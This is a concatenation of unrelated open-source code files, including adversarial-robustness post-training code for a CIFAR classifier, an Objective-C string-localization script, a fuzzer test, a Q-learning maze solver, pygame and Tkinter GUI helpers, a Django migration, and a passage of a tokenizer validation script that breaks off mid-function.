# filter_condition = torch.logical_or(torch.eq(adv_output_class, original_class_expanded),
# torch.eq(adv_output_class, neighbour_class_expanded))
# filter_condition = filter_condition.unsqueeze(1).expand([len(filter_condition), 10])
# print(torch.mean(filter_condition.float()))
# adv_output = torch.where(filter_condition, adv_output, normal_output)
# adv_class = torch.argmax(adv_output)
# loss_pos = loss_func(adv_output, label)
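        # loss_norm is the cross-entropy on the clean outputs; loss_kl is a
        # TRADES-style consistency term that pulls the adversarial output
        # distribution towards the clean one (KLDivLoss takes log-probabilities
        # as its first argument).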
loss_norm = loss_func(normal_output, label)
loss_kl = kl_loss(F.log_softmax(adv_output, dim=1), F.softmax(normal_output, dim=1))
# loss_trades = trades_loss(model, data, label, optimizer)
# loss_neg = loss_func(adv_output, target)
# bce_loss = target_bce_loss_func(adv_output, label, original_class, neighbour_class)
# bl_loss = target_bl_loss_func(adv_output, label, original_class, neighbour_class)
# loss = torch.mean(loss_list)
print("{:.4f} {:.4f}".format(float(loss_norm), float(loss_kl)))
loss = loss_norm + 6 * loss_kl
# loss = loss_trades
optimizer.zero_grad()
loss.backward()
optimizer.step()
defense_acc = cal_accuracy(adv_output, label)
loss_list.append(loss)
acc_list.append(defense_acc)
print('loss: {:.4f} acc: {:.4f}'.format(loss, defense_acc))
return model, original_class, neighbour_class, loss_list, acc_list
``` |
{
"source": "JokerYan/ZOO-Attack",
"score": 2
} |
#### File: ZOO-Attack/fast_adversarial/post_model.py
```python
import argparse
import os
import torch
import torch.nn as nn
from torchvision import transforms
from .preact_resnet import PreActResNet18
from .utils import get_loaders, get_train_loaders_by_class, post_train
pretrained_model_path = os.path.join('.', 'pretrained_models', 'cifar_model_weights_30_epochs.pth')
cifar10_mean = (0.4914, 0.4822, 0.4465)
cifar10_std = (0.2471, 0.2435, 0.2616)
class DummyArgs:
def __init__(self):
self.data_dir = '../cifar-data'
self.mixup = False
self.pt_data = 'ori_neigh'
self.pt_method = 'adv'
self.pt_iter = 50
self.rs_neigh = False
self.blackbox = False
class PostModel(nn.Module):
def __init__(self, model=None, args=None):
super().__init__()
if model is None:
state_dict = torch.load(pretrained_model_path)
model = PreActResNet18().cuda()
model.load_state_dict(state_dict)
model.float()
model.eval()
self.model = model
self.transform = transforms.Compose([
transforms.Normalize(cifar10_mean, cifar10_std)
])
if args is None:
args = DummyArgs()
self.args = args
self.train_loader, _ = get_loaders(self.args.data_dir, batch_size=128)
self.train_loaders_by_class = get_train_loaders_by_class(self.args.data_dir, batch_size=128)
self.post_model = None
# def update_post_model(self, images):
# sample_images = images[0, :, :, :].unsqueeze(0)
# sample_images = self.transform(sample_images)
# del self.post_model
# post_model, original_class, neighbour_class, loss_list, acc_list, neighbour_delta = \
# post_train(self.model, sample_images, self.train_loader, self.train_loaders_by_class, self.args)
# self.post_model = post_model
def forward(self, images):
images = self.transform(images)
sample_images = images[0, :, :, :].unsqueeze(0)
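        # Post-training happens on the fly: the base model is adapted with the
        # first image of the batch, then the adapted model classifies the whole batch.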
post_model, original_class, neighbour_class, loss_list, acc_list, neighbour_delta = \
post_train(self.model, sample_images, self.train_loader, self.train_loaders_by_class, self.args)
return post_model(images)
# return self.model(images)
```
#### File: ZOO-Attack/fast_adversarial/post_model_tf.py
```python
import tensorflow as tf
import numpy as np
import torch
from tqdm import tqdm
from .post_model import PostModel
class PostModelTf():
def __init__(self):
self.post_model = PostModel()
self.image_size = 32
self.num_channels = 3
self.num_labels = 10
def predict(self, x):
# print("===========================================")
# print(type(x))
# # print(x)
#
# x = tf.reshape(x, [-1, 32 * 32 * 3])
# y = tf.reduce_max(x, axis=1)
y = tf.py_function(func=self.py_predict, inp=[x], Tout=tf.float32)
return y
def py_predict(self, x):
if not isinstance(x, np.ndarray):
x = x.numpy()
x = x.astype(np.float32)
y_list = []
batch_size = 64
for i in range(0, len(x), batch_size):
x_batch = x[i:i+batch_size, :, :, :]
x_batch = torch.from_numpy(x_batch).cuda()
# x_batch = x_batch.unsqueeze(0)
# B x W x H x C -> B x C x W x H
x_batch = x_batch.permute(0, 3, 1, 2)
# if i == 0:
# self.post_model.update_post_model(x_batch)
y_batch = self.post_model.forward(x_batch)
y_list.append(y_batch.detach())
y = torch.cat(y_list)
# y = self.post_model.forward(x)
y = y.detach().cpu().numpy()
return y
``` |
{
"source": "jokerYellow/TranslateFiles",
"score": 2
} |
#### File: jokerYellow/TranslateFiles/localizable.py
```python
import re
from opencc import OpenCC
openCC = OpenCC('s2hk')
openCCS = OpenCC('hk2s')
arr = []
arrConst = []
def readFile(path):
f = open(path,'r');
content = f.readlines();
f.close()
return content;
def writeFile(path,content):
f = open(path,'w')
f.write(content);
f.close();
#The following statements are not processed:
#DKImageWithNames
#//
##NSLog
def shouldIgnore(string):
regs = ['^[ ]*//[ ]*',
'^[ ]*NSLog\(@\"[ ]*'];
for reg in regs:
if re.search(reg,string):
return True;
regsShouldRecord = ['const[ ]*',
'^[ ]*NSAssert[ ]*',
'imageNamed[ ]*\:[ ]*'];
for reg in regsShouldRecord:
if re.search(reg,string):
arrConst.append(string);
return True;
return False;
#Check whether the string still needs handling: True means it has to be processed, False means it has already been localized
def shouldHandle(string):
regs = ['NSLocalizedString[ ]*\([ ]*$',
'NSLocalizedStringWithDefaultValue[ ]*\([ ]*$',
'NSLocalizedStringFromTable[ ]*\([ ]*$',
'NSLocalizedStringFromTableInBundle[ ]*\([ ]*$',
'localizedStringForKey[ ]*\:[ ]*$',
'STTLocalizedString[ ]*\([ ]*$'];
for reg in regs:
if re.search(reg,string):
return False;
return True;
def handleString(string,comment):
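    #Look for an Objective-C string literal @"..." containing at least one
    #Chinese character (U+4E00..U+9FA5); only such literals get localized.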
result = re.search(r'@"[^\n"]*[\u4E00-\u9FA5][^\n"]*"',string);
if result:
if shouldIgnore(string):
return string;
stringBefore = string[:result.span()[0]];
stringAfter = string[result.span()[1]:];
stringMiddle = result.group(0);
stringHK = openCC.convert(stringMiddle)
stringResult = str();
if shouldHandle(stringBefore):
stringReplace = "STTLocalizedString(%s)"%(stringHK);
stringResult = stringBefore+stringReplace+stringAfter;
addToLocalizable(stringHK,stringMiddle);
return handleString(stringResult,comment);
else:
            #Continue processing the rest of the string
stringAfter = handleString(stringAfter,comment);
stringResult = stringBefore+stringHK+stringAfter;
return stringResult;
else:
return string;
def appendRecord(content,path):
f = open(path,'a')
f.write(content);
f.close();
def addToLocalizable(hkStr,sStr):
hkStr = hkStr[1:];
sStr = openCCS.convert(sStr[1:]);
if arr.count((hkStr,sStr)) == 0:
arr.append((hkStr,sStr))
def saveLocalizableFile(replaceRecord):
if len(arr) == 0:
return;
content = str();
for (hk,s) in arr:
content = content + "%s = %s;\n"%(hk,s)
f = open(replaceRecord,'w')
f.write(content);
f.close();
def saveConstFile(replaceRecord):
if len(arrConst) == 0:
return;
content = str();
for s in arrConst:
content = content + "%s\n"%(s)
f = open(replaceRecord,'w')
f.write(content);
f.close();
def LocalizableFile(filePath,recordPath):
arr = [];
arrConst = [];
content = readFile(filePath);
result = str();
replaceRecord = str();
times = 0;
for i in range(0,len(content)):
line = content[i];
arr = filePath.split('/')
comment = "%s rownumber:%d"%(arr[len(arr)-1],i+1)
lineHandled = handleString(line,comment);
if line != lineHandled:
times = times+1;
replaceRecord = replaceRecord+filePath+'\n'+str(times)+'.'+'rownumber:%d'%(i+1)+'\n'+ "before:"+line+"\n"+"after:"+lineHandled + "--------------------------------------------------------------------------------------\n"
result = result+lineHandled
if replaceRecord:
appendRecord(replaceRecord+'\n',recordPath+'/changeLog');
saveLocalizableFile(recordPath+'/file.strings')
saveConstFile(recordPath+'/手动处理')
# writeFile(filePath,result);
return times;
``` |
{
"source": "JokeZhang/fuchsia",
"score": 2
} |
#### File: fuzzing/test/test_e2e.py
```python
import os
import sys
import unittest
import test_env
import lib.command as command
from lib.host import Host
from lib.factory import Factory
from test_case import TestCaseWithIO
class IntegrationTest(TestCaseWithIO):
def assertNoErrors(self):
"""Convenience method to reset stdout and assert stderr is empty."""
self.assertOut([], n=0)
self.assertErr([])
def test_e2e(self):
# Set up hermetic environment.
host = Host()
host.fd_out = self._stdout
host.fd_err = self._stderr
with host.temp_dir() as temp_dir:
# (Re-)parse the command line arguments, a la main.py.
factory = Factory(host=host)
parser = factory.parser
args = parser.parse_args()
# Ensure exactly 1 fuzzer is selected.
fuzzer = factory.create_fuzzer(args)
self.assertNoErrors()
args.name = str(fuzzer)
list_args = parser.parse_args(['list', args.name])
list_args.command(list_args, factory)
self.assertOut(
['Found 1 matching fuzzer for "{}":'.format(str(fuzzer))], n=1)
self.assertNoErrors()
start_args = parser.parse_args(
['start', '-o', temp_dir.pathname, args.name])
proc = command.start_fuzzer(start_args, factory)
self.assertNoErrors()
stop_args = parser.parse_args(['stop', args.name])
command.stop_fuzzer(stop_args, factory)
self.assertNoErrors()
if proc:
proc.wait()
check_args = parser.parse_args(['check', args.name])
command.check_fuzzer(check_args, factory)
self.assertOut(['{}: STOPPED'.format(args.name)], n=1)
self.assertNoErrors()
unit = os.path.join(temp_dir.pathname, 'unit')
with open(unit, 'w') as opened:
opened.write('hello world')
repro_args = parser.parse_args(['repro', args.name, unit])
command.repro_units(repro_args, factory)
self.assertNoErrors()
analyze_args = ['analyze', '-max_total_time=10', args.name]
if args.local:
analyze_args.append('--local')
analyze_args = parser.parse_args(analyze_args)
command.analyze_fuzzer(analyze_args, factory)
self.assertNoErrors()
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jokfun/astrocalc",
"score": 3
} |
#### File: jokfun/astrocalc/lecture.py
```python
import sys
from intervalle import create_inter_without
from random import seed,shuffle
def lecture(source=None,target=None,fseed=100,fpercent=100):
"""
Create conversion of the source file and the target file
    Shuffle method is used, based on the seed (default 100)
"""
seed(fseed)
try:
copysource = []
copytarget = []
if(source!=None and target!=None):
source = create_inter_without(source)
target = create_inter_without(target)
shuffle(source)
shuffle(target)
for i in range(0,(int(len(source)*fpercent/100))):
copysource.append(source[i])
if(len(copysource)==0):
copysource.append(source[0])
for i in range(0,(int(len(target)*fpercent/100))):
copytarget.append(target[i])
if(len(copytarget)==0):
copytarget.append(target[0])
return copysource,copytarget
except Exception as e:
print(e)
```
#### File: jokfun/astrocalc/relation.py
```python
from time import time
#import hungarian as hg
def intervalle(result,tab,dic):
"""
    Group all elements into a single array, with no duplication, by using a dictionary which works here as a memory
"""
for ligne in tab:
for ele in ligne:
"""
        The whole trick is here
        By using a dict, we don't have to scan every element already stored in result
        This keeps the processing time down as result grows bigger and bigger
"""
try:
a = dic[str(ele)]
except Exception as e:
dic[str(ele)] = []
result.append(ele)
return result,dic
def create_all(source,target):
"""
    Group all the elements of the source and the target in a single array, with no duplication
    All existing intervals of both files will be returned
"""
t = time()
result = []
dic = {}
result,dic = intervalle(result,target,dic)
result,dic = intervalle(result,source,dic)
return result
def belongTo(interval,tab,name):
"""
Build the condensed representation for interval-based relations
"""
result = []
for i in range(0,len(interval)):
for j in range(0,len(tab[0])):
for k in range(0,len(tab)):
if interval[i][0][0] >= tab[k][j][0] and interval[i][0][1] <= tab[k][j][1]:
interval[i].append(name+str(j))
break
def createError(inter,len1,len2,nsource,ntarget):
"""
Build the error measures
"""
result = []
for i in range(0,len1):
ligne = []
for j in range(0,len2):
valmax = 0
valoccur = 0
for k in inter:
if nsource+str(i) in k:
valmax+=1
if ntarget+str(j) in k and nsource+str(i) in k:
valoccur+=1
ligne.append(1-(valoccur/valmax))
result.append(ligne)
return result
def relation(source,target):
"""
Create the similarity between the source and the target
"""
resum = []
inter = create_all(source,target)
new = []
for k in inter:
new.append([k])
inter = new
t = time()
nameSource = "src"
nameTarget = "trg"
belongTo(inter,source,nameSource)
belongTo(inter,target,nameTarget)
taberror = createError(inter,len(source[0]),len(target[0]),nameSource,nameTarget)
resum.append(taberror)
"""
#Remove comment to test the example
for k in taberror:
print(k)
"""
"""
Can return the hungarian result
"""
#hungarian = hg.Hungarian(taberror)
#hungarian.calculate()
#result = hungarian.get_results()
return resum
if __name__=="__main__":
"""
Test to check if the algorithms used (SIMILARITY) are correct
"""
source = [
[[0,0.5],[0,1],[0,1]],
[[1,1.5],[1,2],[3,3.5]],
[[2,3],[1.5,4],[2,3]]
]
target = [
[[0,1.5],[1,2],[1.6,1.8],[2,3]],
[[0,1.5],[1,2],[3.1,4],[2,3]],
[[0,1.5],[0,1],[0,0.5],[1,2]],
[[2,3.5],[2,3],[0,0.5],[1,2]],
[[2,3.5],[1,2],[0,0.5],[1,2]]
]
relation(source,target)
```
#### File: jokfun/astrocalc/similarity.py
```python
from tkinter import *
from tkinter.filedialog import *
from lecture import lecture
from relation import relation
from random import randint
import os
class similarity:
def __init__(self,win):
win.title("Similarity")
self.fen1 = win
listd = self.fen1.grid_slaves()
for l in listd:
l.destroy()
self.source = None
self.target = None
def sourceFile(self):
#Just select the csv files
sourcef = askopenfilename(title="Select the source",
initialdir=os.getcwd(),
filetypes=[('csv files','.csv')])
try :
self.source = open(sourcef,"r")
self.nameT1 = sourcef
self.txtfile1.configure(text = sourcef)
except Exception as e:
            self.txtfile1.configure(text = "Error while opening the file")
def targetFile(self):
#Just select the csv files
targetf = askopenfilename(title="Select the target",
initialdir=os.getcwd(),
filetypes=[('csv files','.csv')])
try :
self.target = open(targetf,"r")
self.nameT2 = targetf
self.txtfile2.configure(text = targetf)
except Exception as e:
            self.txtfile2.configure(text = "Error while opening the file")
def addligne(self,tab, name):
text = name + " :\n"
for i in range(0,len(tab)):
text += str(tab[i])+"\n"
return text
def savefile(self,savedata):
"""
        Select a save file
        Write the result in the selected save file
"""
rep=os.getcwd()
savemsg = ""
nomfile = "save_"+str(randint(0,1000))
try:
repfic = asksaveasfilename(title="Save result",
initialdir=rep,
initialfile=nomfile,
filetypes = [("txt files",".txt")])
if(len(repfic)>0):
f = open(repfic+".txt","w")
for k in savedata:
f.write(k)
f.close()
savemsg = "Results saved in : "+repfic+".txt"
else:
savemsg = "Change the save"
except Exception as e:
savemsg = 'Error while saving the file'
self.errsave = Label(self.fen1, text =savemsg,justify="left")
self.errsave.grid(row =8, column=3,sticky="w")
def resum(self,tab):
self.frame = Frame(self.fen1,width=400,height=300)
self.frame.grid(row=6,column=3)
self.frame.grid_propagate(False)
self.frame.grid_rowconfigure(0, weight=1)
self.frame.grid_columnconfigure(0, weight=1)
        ens = ["seed","percent","error"]
text = ""
for i in range(0,len(tab)):
text+=self.addligne(tab[i],ens[i]) + "\n"
self.res = Text(self.frame,borderwidth=3, relief="sunken",wrap='word')
self.res.grid(row=0,column=0,padx=5,pady=5)
self.res.insert(END, text)
self.scrolly = Scrollbar(self.frame, command=self.res.yview)
self.scrolly.grid(row=0, column=1, sticky='nsew')
self.res['yscrollcommand'] = self.scrolly.set
"""
scrollx = Scrollbar(frame, command=res.xview)
scrollx.config(orient="horizontal")
scrollx.grid(row=1, column=0, sticky='nsew')
res['xscrollcommand'] = scrollx.set
"""
return text
def launch(self):
if(self.source!=None and self.target!=None and type(self.source)!=list and type(self.target)!=list):
seedget = self.seed.get()
percentget = self.percent.get()
try:
fseed = int(seedget)
except Exception:
fseed = 100
try:
fpercent = int(percentget)
if fpercent<=0 or fpercent>100:
fpercent = 100
except Exception:
fpercent = 100
source,target = lecture(self.source,self.target,fseed,fpercent)
result = relation(source,target)
savetext = self.resum([[fseed], [fpercent]] + result)
self.savef=Button(self.fen1, text="Save",command= lambda: self.savefile(savetext))
self.savef.grid(row=7,column=3,sticky="W")
else:
self.txtfile3.configure(text = "Missing files")
def run(self):
#Select the Source
self.txt1 = Label(self.fen1, text ='Source :')
self.txt1.grid(row =1,column=1)
self.txtfile1 = Label(self.fen1, text = "No file")
self.txtfile1.grid(row =1, column=3,sticky=W)
self.bouton1=Button(self.fen1, text="Select", command=self.sourceFile)
self.bouton1.grid(row =1, column =2)
#Select the target
self.txt2 = Label(self.fen1, text ='Target :')
self.txt2.grid(row =2, column=1)
self.bouton2=Button(self.fen1, text="Select", command=self.targetFile)
self.bouton2.grid(row =2, column =2)
self.txtfile2 = Label(self.fen1, text = "No file")
self.txtfile2.grid(row =2, column=3,sticky=W)
#Select the Seed
self.txt3 = Label(self.fen1, text = 'Seed :')
self.txt3.grid(row =3, column=1)
self.seed = Entry(self.fen1, width=10)
self.seed.grid(row =3, column=2)
#Select the Percent
self.txt4 = Label(self.fen1, text= 'Percent :')
self.txt4.grid(row =4, column=1)
self.percent = Entry(self.fen1, width=10)
self.percent.grid(row =4, column=2)
#Lauch
self.lancement=Button(self.fen1, text="Launch",command=self.launch)
self.lancement.grid(row=5, column=1)
self.txtfile3 = Label(self.fen1, text = "Waiting to launch")
self.txtfile3.grid(row =5, column=2)
``` |
{
"source": "jokfun/Dog_Breed_Classifier",
"score": 4
} |
#### File: jokfun/Dog_Breed_Classifier/window.py
```python
from tkinter import *
from PIL import ImageTk, Image
from tkinter import filedialog
import os
from testme import Predict
class Window:
def __init__(self,classifier):
        #the most expensive component (the classifier) is loaded before the application starts
self.predict = Predict(classifier)
#the main tkinter app
self.root = Tk()
self.root.title("Dog Breed Classifier")
#can't resize the window
self.root.resizable(width=False, height=False)
#create an empty filename in order to create the label
self.filename=""
#label of the image's path
self.pathtext = Label(self.root, text=self.filename)
self.pathtext.grid(row=1,column=1)
#label of the prediction
self.predictiontext = Label(self.root, text="")
self.predictiontext.grid(row=2,column=1)
#default image displayed
self.open_img("FirstDog.jpg")
#button to load a new image
btn = Button(self.root, text='open image', command=self.open_img)
btn.grid(row=1,column=0)
#button to launch the prediction
btn = Button(self.root, text='Run', command=self.getPredict)
btn.grid(row=2,column=0)
#main loop of the tkinter window, create all the content before calling it
self.root.mainloop()
def getPredict(self):
"""
Here we call the function that predicts a new image
"""
        #run the classifier on the selected file and get the prediction back
prediction = self.predict.run(self.filename,printPrediction=True)
#set the prediction label
self.predictiontext["text"] = "Best match : "+prediction
def openfn(self):
"""
open a dialog box to return the path of an image
"""
self.filename = filedialog.askopenfilename(title='Choose an image',
filetypes=[('jpg', '.jpg'),('jpeg', '.jpeg')])
def open_img(self,path=None,verbose=True):
"""
Load a new image according to the path
Go place the image in the window
"""
        #a default image is loaded at the beginning
        #otherwise ask the user to choose another one
if path==None:
self.openfn()
else:
self.filename=path
#display the image loaded in the console
if verbose:
print("=================")
print("File open :",self.filename)
#keep the name of the img and not the whole path
self.pathtext["text"] = self.filename.split('/')[-1]
#the image will be resized, it may look strange
img = Image.open(self.filename)
img = img.resize((400, 400), Image.ANTIALIAS)
img = ImageTk.PhotoImage(img)
#the new image is placed in the same position
panel = Label(self.root, image=img)
panel.image = img
panel.grid(row=0, column=0, columnspan=2, rowspan=1,
sticky=W+E+N+S, padx=5, pady=5)
if __name__ == "__main__":
#Default classifier
classifier = "dog_classifier.tfl.ckpt-24700"
window=Window(classifier)
``` |
{
"source": "jokfun/Maze-Solver-QLearning",
"score": 3
} |
#### File: jokfun/Maze-Solver-QLearning/solver.py
```python
import os
#We don't want to show the pygame version and welcome message. Snif
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
from random import uniform,randint
import tqdm
"""
We import pygame in order to create a patch for the long calculations
If the QLearning calculation time or the creation of the path is too long, the application crashes.
So we need to create a patch to avoid this
This patch is not too resource-intensive and is not necessary if you don't use the graphical interface
"""
import pygame
class Solver:
def __init__(self,maze,learning_rate=0.8,discount_factor=0.5,maxstep=1000,epsilon=0.3,interface=True):
"""
Initiate the solver
Hyperparameters :
- maze : the maze which is a 2-dimensional array containing only numerical values
- learning_rate : the learning rate of the QLearning algorithm, must be between 0 and 1
- discount_factor : the discount factor of the QLearning algorithm, must be between 0 and 1
- maxstep : Number of explorations the agent will perform.
An exploration starts at the start and must find the exit.
        - epsilon : the value of the epsilon-greedy method, must be between 0 and 1
- interface : if you are using the solver with an application (True) or not (False)
"""
self.learning_rate = learning_rate
self.discount_factor = discount_factor
self.maxstep = int(maxstep)
self.epsilon = epsilon
#Variable indicating whether an interface is used
self.interface = interface
"""
Maze code :
path = 0
start = 1
end = 2
trap = 3
wall = 4
"""
self.maze = maze
#Create constants of the maze
self.length = len(maze)
self.width = len(maze[0])
#Explore the maze
self.start = None
self.end = None
self.trap = []
for i in range(self.length):
for j in range(self.width):
ele = maze[i][j]
if ele == 1:
self.start = (i,j)
elif ele == 2:
self.end = (i,j)
elif ele == 3:
self.trap.append((i,j))
#The maze must have an enter and an exit
if self.start==None or self.end==None:
print("Maze must have a start (code1) and an end (code 2)")
quit()
def learning(self):
"""
        The Q-Learning algorithm, as described in
        "Reinforcement Learning: An Introduction" by Sutton and Barto
"""
#Init the QTable
self.createQ()
#Until all the episodes are completed
for i in tqdm.trange(self.maxstep):
#Begin the episode at the start of the maze
posX = self.start[0]
posY = self.start[1]
#The episode runs until the agent arrives at his destination
while(not(posX==self.end[0] and posY==self.end[1]) and
not ((posX,posY) in self.trap)):
#Application control
if self.interface :
#The crash proof patch
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
exit()
#The next position of the agent depend on a greedy choice
choice = self.greedyChoice(posX,posY)
#Update the next position of the agent
newX,newY = self.updatePosition(choice,posX,posY)
#Test if the new position is the exit
if newX==self.end[0] and newY==self.end[1]:
reward = 1
#Test of the new position is a trap
elif (newX,newY) in self.trap:
reward = -1
else:
reward = 0
#Coordinates in the QTable of the last and new position
t_pos = posX*self.width+posY
tpos = newX*self.width+newY
#Update the QTable
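                #Standard Q-Learning update rule:
                #Q(s,a) <- Q(s,a) + learning_rate * (reward + discount_factor * max_a' Q(s',a') - Q(s,a))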
self.Qtable[t_pos][choice] = self.Qtable[t_pos][choice] + self.learning_rate * (reward + self.discount_factor*max(self.Qtable[tpos]) - self.Qtable[t_pos][choice])
#Position of the agent is update
posX=newX
posY=newY
#When the algorithm is over, create the path the agent has to follow from the start to the end
path = []
posX = self.start[0]
posY = self.start[1]
#Create a counter while creating the path
count = 0
#Create the path until it finds the exit
        #OR it reaches a limit:
        # with the fixed maxstep the Q-Learning may not have converged, so a complete path to the exit might not exist
while not(posX==self.end[0] and posY==self.end[1]) and count<=self.length*self.width:
#Application control
if self.interface :
#The crash proof patch
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
exit()
#Coordinates in the QTable of the position
pos = posX*self.width+posY
#Take the best direction
direction = self.Qtable[pos].index(max(self.Qtable[pos]))
#Update the path
path.append(direction)
#Update the next position
posX,posY = self.updatePosition(direction,posX,posY)
count+=1
return path,self.start
def updatePosition(self,direction,posX,posY):
"""
Update (x,y) coordinates depend on a direction
"""
if direction==0:
posX-=1
elif direction==1:
posX+=1
elif direction==2:
posY+=1
elif direction==3:
posY-=1
return posX,posY
def greedyChoice(self,posX,posY):
"""
Epsilon-Greedy choice
"""
        #Take the line in the QTable corresponding to the position
ligne = self.Qtable[posX*self.width+posY]
if uniform(0,1)>=self.epsilon:
#best choice of the line
return ligne.index(max(ligne))
else:
#Or take a random position
#Not the most elegant way to do it
choice = []
for i in range(4):
if ligne[i]!=-1:
choice.append(i)
pos = randint(0,len(choice)-1)
return choice[pos]
def createQ(self):
"""
Create the Qtable
        Globally, we just have to test whether the value at each position is a wall or not
"""
self.Qtable = []
for i in range(self.length):
for j in range(self.width):
ligne = []
#up
if i-1<0 or self.maze[i-1][j]==4:
ligne.append(-1)
else:
ligne.append(0)
#bottom
if i+1>=self.length or self.maze[i+1][j]==4:
ligne.append(-1)
else:
ligne.append(0)
#right
if j+1>=self.width or self.maze[i][j+1]==4:
ligne.append(-1)
else:
ligne.append(0)
#left
if j-1<0 or self.maze[i][j-1]==4:
ligne.append(-1)
else:
ligne.append(0)
self.Qtable.append(ligne)
if __name__ == "__main__":
"""
Test a maze
"""
maze = [
[0,0,0,0,0,0,0,4,2],
[0,0,0,0,0,4,0,4,0],
[0,0,0,0,3,4,0,0,0],
[0,0,0,0,0,4,4,4,0],
[1,0,0,0,0,0,0,4,3]
]
solver = Solver(maze,interface=False)
print(solver.learning())
``` |
{
"source": "jokfun/Text-Button-Pygame",
"score": 4
} |
#### File: jokfun/Text-Button-Pygame/textinput.py
```python
import pygame
class textInput:
def __init__(self,screen,axex,axey,length,height,
maxdigit = 8,
textsize=20,
textcolor=(255,255,255),
bordercolor=(255,255,255),
bordercolor_click=(0,0,255),
fontcolor=(7,9,44) ):
"""
Required parameters :
- screen of your game/app (created with pygame.display.set_mode)
- axex = position x of the top left corner of the box
        - axey = position y of the top left corner of the box
- length = length of the box
- height = height of the box
Optional hyperparameters :
- maxdigit = number of digits allowed in the content (incl. point)
- textsize = size of the text
- textcolor = color of the text display
- bordercolor = color of the outer edge of the field
- bordercolor_click = color of the outer edge of the field when you click on
- fontcolor = field background color
"""
#Fix the values of the different color
self.bordercolor = bordercolor
self.fontcolor = fontcolor
self.textcolor = textcolor
self.textsize = textsize
self.bordercolor_click = bordercolor_click
#Fix your screen used in your app
self.screen = screen
#Fix the number of digits allowed in the content
self.maxdigit = maxdigit
#Fix positions of the field
self.axex = axex
self.axey = axey
self.length = length
self.height = height
#Create the field
self.rect = pygame.rect.Rect( (axex,axey) , (length,height) )
screen.fill(self.bordercolor, self.rect)
screen.fill(self.fontcolor, self.rect.inflate(-2, -2))
#Init the content
self.content = "0"
#Create the font of the text
self.textfont = pygame.font.SysFont('Calibri', self.textsize)
#Show the field
self.displaytext()
#boolean to test if you click on the field
self.click = False
        #Values allowed in the content
self.allow = [str(i) for i in range(10)]
def displaytext(self):
"""
Function to update the content on the field
"""
self.screen.fill(self.fontcolor, self.rect.inflate(-2, -2))
self.textsurface = self.textfont.render(self.content, False, self.textcolor)
self.screen.blit(self.textsurface,(self.axex+5,self.axey+15))
def update(self,events,posx,posy):
"""
Method for updating content based on user actions
Parameters :
- events : list of pygame event
- posx = position x of the mouse
- posy = position y of the mouse
"""
#Test if the mouse is in the text field
if not (posx>=self.axex and posx<=self.axex+self.length and posy>=self.axey and posy<=self.axey+self.height):
if pygame.mouse.get_pressed()[0]==1:
#If you click outside the field, it will reset the border and prevent it from being changed
self.click = False
self.screen.fill(self.bordercolor, self.rect)
self.screen.fill(self.fontcolor, self.rect.inflate(-2, -2))
elif pygame.mouse.get_pressed()[0]==1:
#If you click in the field, the border will change and you will be able to modify it
self.click=True
self.screen.fill(self.bordercolor_click, self.rect)
self.screen.fill(self.fontcolor, self.rect.inflate(-2, -2))
#If you can change the content
if self.click == True:
for event in events:
#If a key is pressed
if event.type == pygame.KEYDOWN:
#Delete content if it exists
if event.key == pygame.K_BACKSPACE and len(self.content)>0:
self.content = self.content[:-1]
#Add a dot (for decimal numbers)
elif (event.key == pygame.K_KP_PERIOD or event.key == pygame.K_PERIOD) and len(self.content)<self.maxdigit:
#Cannot add dot if it's already in
if "." not in self.content:
self.content = self.content + "."
#Take the value of the pressed key and convert it into readable data
value = pygame.key.name(event.key)
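                    #numpad keys are reported as '[x]', so strip the brackets to keep only the digit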
value = value.split("[")[-1].split("]")[0]
#If the value is allowed, it is added to the content.
if value in self.allow and len(self.content)<self.maxdigit:
self.content = self.content + value
#Update the text of the field
self.displaytext()
def getValue(self):
"""
Return the value of the content
"""
return float(self.content)
if __name__ == "__main__":
import time
pygame.init()
pygame.font.init()
screen = pygame.display.set_mode((300, 100))
#We create the text field
text = textInput(screen,20,30,200,50,maxdigit=15)
while True:
pygame.display.update()
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
exit()
mouse = pygame.mouse.get_pos()
x = mouse[0]
y = mouse[1]
#We update the text
text.update(events,x,y)
``` |
{
"source": "jokiefer/sweethome",
"score": 2
} |
#### File: accounts/migrations/0002_initial_data.py
```python
import os
from django.contrib.auth import get_user_model
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
def generate_superuser(apps, schema_editor):
superuser = get_user_model().objects.create_superuser(
username=os.environ.get("SWEETHOME_USER"),
password=<PASSWORD>("<PASSWORD>")
)
superuser.is_active = True
superuser.save()
operations = [
migrations.RunPython(generate_superuser),
]
```
#### File: backend/home/managers.py
```python
from django.db import models
from django.db.models.aggregates import Sum
class PartQuerySet(models.QuerySet):
def for_building(self, building_id):
return self.filter(unit__surface__room__level__building__pk=building_id)
def total_price(self):
return self.aggregate(total_price=Sum('price'))
``` |
{
"source": "jokieleung/Maria",
"score": 3
} |
#### File: retrieval_model/tokenization/to_hdf5.py
```python
import h5py
import numpy as np
import tqdm
from transformers import AutoTokenizer
def validate_hdf5(fname, tokenizer_name):
print("--------------------------------------------")
print("Start to valid the hdf5 file", fname + '.' + tokenizer_name + '.hdf5')
with open(fname,'rb') as f:
lines = []
for line in f:
line = line.decode()
if 'wiki' in fname:
# Wiki103: remove document title
if line.startswith(' = '):
continue
# Full Wiki: Remove the too short lines.
if len(line.strip().split(' ')) < 5:
continue
if len(line.strip()) == 0:
# Always drop empty line
continue
lines.append(line)
# Use the slow tokenizer to validate the results of the fast tokenizer.
tokenizer = AutoTokenizer.from_pretrained(tokenizer_name)
h5_file = h5py.File(fname + '.' + tokenizer_name + '.hdf5', 'r')
tokens = h5_file['tokens']
print("Start to check the first 10 lines:")
ids = []
for line in lines[:10]:
ids.extend(tokenizer.convert_tokens_to_ids(tokenizer.tokenize(line)))
ids = np.array(ids)
first_tokens = np.array(tokens[:len(ids)])
if np.array_equal(ids, first_tokens):
print("PASS")
else:
print(' '.join(tokenizer.convert_ids_to_tokens(ids)))
print()
print(' '.join(tokenizer.convert_ids_to_tokens(first_tokens)))
assert False, "FAIL"
print("Start to check the last 10 lines:")
ids = []
for line in lines[-10:]:
ids.extend(tokenizer.convert_tokens_to_ids(tokenizer.tokenize(line)))
ids = np.array(ids)
last_tokens = np.array(tokens[-len(ids):])
if np.array_equal(ids, last_tokens):
print("PASS")
else:
